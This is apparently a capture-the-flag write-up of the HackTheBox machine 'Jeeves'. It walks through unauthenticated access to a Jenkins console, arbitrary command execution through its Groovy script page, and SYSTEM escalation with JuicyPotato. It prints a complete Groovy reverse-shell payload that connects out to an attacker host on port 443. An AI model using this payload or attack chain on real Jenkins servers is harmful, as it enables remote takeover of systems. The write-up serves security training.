10.10.10.63 - Jeeves - Jenkins WebServer, SeImpersonatePrivilege
Summary: vulnerable software : Unauthenticated access to Jenkins WebServer system vulnerable : 10.10.10.63 vulnerability explanation : privilege escalation: seImpersonatePrivilege given to a user severity : critical
Launch a scanner to discover open ports. In this case -O (OS detection) -A (aggressive) --script vuln was also used:
Even though Nmap did not discover specific OS, from the webserver banner we learn that Microsoft-IIS 10.0 is in place suggesting: Windows 10 or Windows Server 2016.
IIS 10.0 is the latest version of Internet Information Services (IIS) which shipped with Windows 10 and Windows Server 2016. - Microsoft.com
Port 50000 provided access to a Jetty WebServer.
Jetty 9.4.z-SNAPSHOT running on port 5000
Since we did not find enough to proceed with further exploitation, directories bruteforcing came into play:
Dirbuster provided a rich overview of the content sitting on the Jetty Server.
From here it was easy to follow the trail that led us to a Jenkins server. Installation and management console did not require authentication which is a first sign of a vulnerability.
Jenkins is an open source automation server written in Java. Jenkins helps to automate the non-human part of the software development process, with continuous integration and facilitating technical aspects of continuous delivery. It is a server-based system that runs in servlet containers such as Apache Tomcat. Wikipedia
Jenkins Version
Year of the release:
Useful information when searching for possible exploits.
Jenkins server provides systeminfo function allowing to enumerate OS version, architecture and local user name:
On top of that we discover functionality to access CLI features. After downloading jenkins-cli.jar we can query the system for server privileges information:
java -jar jenkins-cli.jar -s http://10.10.10.63:50000/askjeeves/ who-am-i
Perhaps this feature can provide us for an opportunity to either run a code directly on the host or upload a feature(webshell) that can do that for us. Time to search for available exploits:
Jenkins CLI can be our way in!
All available Metasploit modules for Jenkins were written before 2017 which are unlikely to work in this case, except for Jenkins Enumeration:
Seems like a dead end. However, similar functionality of interacting with Jenkins server is provided through execution of Groovy script located on /askjeeves/script. Thanks to this stackoverflow answer we see that we can make the script execute arbitrary commands on the target host:
Houston we have a lift off.
Searching through github I have found another groovy script allowing for a reverse connection from a Windows host:
1
String host="10.10.14.12";
2
int port=443;
3
String cmd="cmd.exe";
4
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Copied!
Result and a user flag:
SILENTTRINITY stager working as expected:
Great tool for executing in memory .NET assemblies
Host enumeration; no kernel vulnerabilities on this one:
Dead end is never an end
Different path to privilege escalation:
When you see SeImpersonatePrivledge think Juicy Potatoes
In this case we have uploaded juicypotato.exe and we executed our empire launcher with below command as a System User:
Successful root shell as a SYSTEM user
Root flag was hidden elsewhere:
Look deeper... hmmm...
I have looked deeper, we RDPed to the box to pillage the files. All that was needed was a dir /R command to discover a hidden file:
Copy link